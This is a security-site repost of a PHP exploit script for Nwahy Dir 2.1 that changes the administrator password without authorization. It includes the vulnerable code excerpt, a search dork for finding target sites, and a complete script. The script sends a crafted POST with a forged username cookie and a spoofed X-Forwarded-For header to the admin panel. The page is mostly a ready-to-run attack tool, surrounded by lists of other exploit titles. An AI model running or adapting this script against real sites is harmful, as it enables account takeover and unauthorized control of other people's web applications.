首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Nwahy Dir 2.1 Arbitrary Change Admin Password Exploit
来源:recru1t[@]ymail.com 作者:rEcruit 发布时间:2009-07-10  

<?

 /*

   [ Nwahy Dir v2.1 Change Admin Password Exploit ]        
   
  [-] Author        : rEcruit
  [-] Mail            : recru1t[@]ymail.com
  [-] Download   : http://nwahy.com/showdownload-3105.html
  
  [-] Vuln in  ./admincp/admininfo.php
  
   [code]
   
   $u = addslashes($_COOKIE['username']);
   $query = mysql_query ("SELECT * FROM `dlil_admin` WHERE username='$u' AND adminoruser='0'") or die ("Query failed");
   $counts = mysql_num_rows($query);
   if($counts == 0){
   echo "<div align='center'>......................</div>";
   }else{
    
   [/code]
   
  [-] Works On :
  
   1. Nwahy Articles v1
    
   2. Nwahy scripts v1

   3. Nwahy book v1
   
  [-] Note : Path to Control Panel   "/admincp/" .

 */

 error_reporting(0);
 ini_set("max_execution_time",0);
 ini_set("default_socket_timeout",5);


 function Usage()
 {
   print "\n\n";
   print "/------------------------------------------------------------\\\n";
   print "|        Nwahy Dir v2.1 Change Admin Password Exploit        |\n";
   print "\------------------------------------------------------------/\n";
   print "| [-] Author : rEcruit                                       |\n";
   print "| [-] Mail   : recru1t@ymail.com                             |\n";
   print "| [-] Greetz : RAGE SCREAM  , SAUDI L0rD , Fantastic Egypt   |\n";
   print "\------------------------------------------------------------/\n";
   print "| [-] Dork     : Nwahy.com 2.1 , inurl:'add-site.html'       |\n";
   print "| [+] Usage    : php Exploit.php HOST PATH Options           |\n";
   print "| [-] HOST     : Target server (ip/hostname)                 |\n";
   print "| [-] PATH     : Path to Nwahy Dir                           |\n";
   print "| [-] Options  :                                             |\n";
   print "|     =>Proxy  :(ex. 0.0.0.0:8080)                           |\n";
   print "\------------------------------------------------------------/\n";
   print "\n\n";

  exit;
 }


 function Send()
 {
  Global $host,$path,$user,$pwd,$proxy;
  
  if(empty($proxy))
  {
   $Connect = @fsockopen($host,"80") or die("[-] Bad Host .");
  }else{
   $proxy  = explode(":",$proxy);
   $Connect = @fsockopen($proxy[0],$proxy[1]) or die("[-] Bad Proxy .");
  }
  
   $Payload = "username={$user}&password={$pwd}";
   $Packet  .= "POST {$path}/admincp/admininfo.php?action=edit HTTP/1.1 \r\n";
   $Packet  .= "Host: {$host}\r\n";
   $Packet  .= "Cookie: username={$user}\r\n";
   $Packet  .= "X-Forwarded-For: 127.0.0.1\r\n";
   $Packet  .= "Content-Type: application/x-www-form-urlencoded\r\n";
   $Packet  .= "Content-Length: ".(strlen($Payload))."\r\n";
   $Packet  .= "Connection: close\r\n\r\n";
   $Packet  .= $Payload;

    fputs($Connect,$Packet);

    while(!feof($Connect))
    $Response .= @fgets($Connect,2048);

    fclose($Connect);
  
  return $Response;
 }
 
 
 function Login()
 {
  $Response = @Send();

   if(eregi("refresh",$Response))
   {
    $msg = "[-] Password changed .\n";
   }
   elseif(eregi("<div align='center'>",$Response))
   {
    $msg = "[-] Bad username .\n";
   }
   else
   {
    $msg = "[-] Exploit failed .\n";
   }

  return $msg;
 }

 

 if ($argc < 3) Usage();

 $host = $argv[1];
 $path = $argv[2];;
 $proxy = $argv[3];

 
  Print "\r\n[-] Connecting to {$host} .... \r\n";
  
  while(1)
  {
   Print "[-] Username: ";

   if($user = str_replace (" ", "%20", trim(fgets(STDIN))))
   {
    Print "[-] New password: ";

    if($pwd = str_replace (" ", "%20", trim(fgets(STDIN))))
    {
     Print Login();
     exit;
    }


   }


  } //end while

?>


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Linux Kernel <= 2.6.28.3 set_s
·otsAV DJ 1.85.064 (.ofl File)
·Microsoft DirectShow (msvidctl
·Mlffat 2.2 Remote Blind SQL In
·TalkBack 2.3.14 Multiple Remot
·Rcmd.vbs 1.01修正版
·Universe CMS 1.0.6 (vnews.php
·MySQL version 5.0.45 suffers f
·Microsoft Internet Explorer (A
·PatPlayer 3.9 (M3U File) Local
·Photo DVD Maker Pro <= 8.02 (.
·Remote blind SQL injection exp
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved